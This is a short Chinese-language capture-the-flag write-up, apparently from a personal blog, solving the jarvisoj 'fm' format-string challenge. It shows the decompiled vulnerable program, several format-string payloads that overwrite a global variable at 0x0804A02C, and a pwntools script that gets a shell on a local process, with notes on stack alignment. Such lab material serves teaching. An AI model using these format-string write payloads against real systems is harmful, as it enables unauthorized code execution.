Eureka's Studio.

(栈对齐)jarvisoj_fm

Fomatstring
2023/11/01

一道很平常的fmt题目

[栈对齐]jarvisoj_fm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

很明显我们需要的x值为4 我们在测试时发现是3

1
2
3
4
5
AAAA%13$hhn ---> 0x88888804
AAAA%13$hn  ---> 0x88880004
AAAA%13$n   ---> 0x00000004
%4c%13$n    ---> 0x00000004
fmtstr_payload(11,{0x0804A02C:4})

这些都可以 只不过要注意栈对齐 地址前面的必须是4的倍数

1
2
3
4
5
6
7
8
9
10
from pwn import *
sh = process('./fm')
#context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

#gdb.attach('fm')
#payload = fmtstr_payload(11,{0x0804A02C:4})
#payload = '%4c%13$n' + p32(0x0804A02C)
payload = 'aaaa%14$hhna' + p32(0x0804A02C)
sh.sendline(payload)
sh.interactive()

那么随着padding的增多 地址参数也会改变 需要跟着动调看

Author:Eureka

Link:https://dawoxiansigema.github.io/2023/11/01/jarvisoj-fm/

Publish date:November 1st 2023, 10:24:24 am

Update date:November 1st 2023, 10:28:11 am

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. [栈对齐]jarvisoj_fm
Total : 32
2023
2021
Forensic Heap Stack/Medium Stack/Basic Stack/Advanced Htb Fomatstring Fix